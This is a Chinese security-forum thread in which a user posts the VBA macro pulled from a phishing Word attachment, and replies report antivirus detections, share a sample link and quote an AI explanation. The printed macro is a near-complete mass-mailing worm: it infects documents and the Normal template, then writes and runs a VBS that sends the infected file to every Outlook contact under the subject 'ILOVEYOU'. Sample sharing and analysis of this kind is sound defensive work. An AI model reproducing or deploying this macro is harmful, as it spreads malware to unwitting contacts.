宏病毒样本 1x

显示全部楼层 · 发表于 2023-3-26 11:05:24

本帖最后由 python无名氏于 2023-3-26 12:33 编辑

一封钓鱼邮件来的，说什么从我账户里扣除了3000$用于购买母亲节钻石，要我看附件里的doc[过滤]，笑死，我一分钱没有

好久没有收到类似的钓鱼邮件了
下下来olevba了一下，根据感染标记，就姑且叫他PHMM吧！
VBA代码：

'PHMM
Sub AutoOpen()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeMoudle.Lines(1, 100)
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
End If
With Host
If .Lines(1.1) <> "'PHMM" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, Ourcode
.ReplaceLines 2, "Sub AutoClose()"
If ThisDocument = NormalTemplate Then
.ReplaceLines 2, "Sub AutoOpen()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Open Environ("TEMP") & "" & "Sender.vbs" For Output Access Write As #1
Print #1, "On Error Resume Next"
Print #1, "dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad"
Print #1, "set regedit=CreateObject" & Chr(40) & Chr(34) "WScript.Shell" & Chr(34) & ")"
Print #1, "set out=WScript.CreateObject" & Chr(40) & Chr(34) & "Outlook.Application" & Chr(34) & Chr(41)"
Print #1, "set mapi=out.GetNameSpace" & Chr(40) & Chr(34) & "MAPI" & Chr(34) & Chr(41)"
Print #1, "for ctrlists=1 to mapi.AddressLists.Count"
Print #1, "set a=mapi.AddressLists(ctrlists)"
Print #1, "x=1"
Print #1, "regv=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a)"
Print #1, "if (regv="Chr(34) & Chr(34) & Chr(41) & " then"
Print #1, "regv=1"
Print #1, "end if"
Print #1, "if (int(a.AddressEntries.Count)>int(regv)) then"
Print #1, "for ctrentries=1 to a.AddressEntries.Count"
Print #1, "malead=a.AddressEntries(x)"
Print #1, "regad=" & Chr(34) & Chr(34)
Print #1, "regad=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead)"
Print #1, "if (regad=" & Chr(34) & Chr(34) & Chr(41) & " then"
Print #1, "set male=out.CreateItem(0)"
Print #1, "male.Recipients.Add(malead)"
Print #1, "male.Subject = " & Chr(34) & "ILOVEYOU" & Chr(34)
Print #1, "male.Body = vbcrlf & " & Chr(34) & "Please look at the attachments!" & Chr(34)
Print #1, "male.Attachments.Add" & Chr(40) & Chr(34) & ActiveDocument.FullName & Chr(34) & Chr(41)
Print #1, "male.Send"
Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead,1," & Chr(34) & "REG_DWORD" & Chr(34)"
Print #1, "end if"
Print #1, "x=x+1"
Print #1, "next"
Print #1, "regedit.RegWrite "& Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
Print #1, "end if"
Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
Print #1, "next"
Print #1, "Set out=Nothing"
Print #1, "Set mapi=Nothing"
Close #1
Shell("wscript " & Environ("TEMP") & "" & "Sender.vbs")
End Sub

复制代码

看微步分析出了loveletter，我也是醉了...
没有具体的什么恶意行为
样本微步链接(原样本被误删)：https://s.threatbook.com/report/ ... baa81c7f0a5fbbd379b
(话说这个让人打开宏的把戏好劣质...)

显示全部楼层 · 发表于 2023-3-26 11:13:43

火绒 kill

显示全部楼层 · 发表于 2023-3-26 11:22:02

https://pan.huang1111.cn/s/GDm6iW

显示全部楼层 · 发表于 2023-3-26 11:29:36

本帖最后由 anthonyqian 于 2023-3-26 18:06 编辑

诺顿missed
F-Secure 自己的引擎检测到 Trojan-Downloader:W97M/Neurevt.C

显示全部楼层 · 发表于 2023-3-26 11:56:02

本帖最后由莒县小哥于 2023-3-26 12:46 编辑

显示全部楼层 · 发表于 2023-3-26 12:14:28

微软机器学习击杀Trojan:O97M/Sadoca.C!ml

显示全部楼层 · 发表于 2023-3-26 12:17:59

显示全部楼层 · 发表于 2023-3-26 12:26:09

GPT：“这段代码可能是一种恶意代码，因为它会尝试发送垃圾邮件并进行系统更改。

首先，该代码隐藏了状态栏并禁用了保存文件时的提示。这些操作可能会误导用户，导致用户不知道发生了什么，而在后续的操作中，该代码打开了一个 VB 脚本文件并编写了发送垃圾邮件的代码。该代码从 Outlook 应用程序中获取邮件地址，并发送带有恶意附件的邮件。
此外，该代码还会检查当前文档是否为 NormalTemplate，如果是，它会尝试将其保存到文件系统，可能会覆盖或破坏正常的文档。
因此，如果您不信任此代码的来源或目的，请不要运行它。建议使用杀毒软件或其他安全工具来检查和处理这段代码。”

显示全部楼层 · 发表于 2023-3-26 12:54:32

智量

显示全部楼层 · 发表于 2023-3-26 13:18:35

火绒
killed

[病毒样本] 宏病毒样本 1x

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块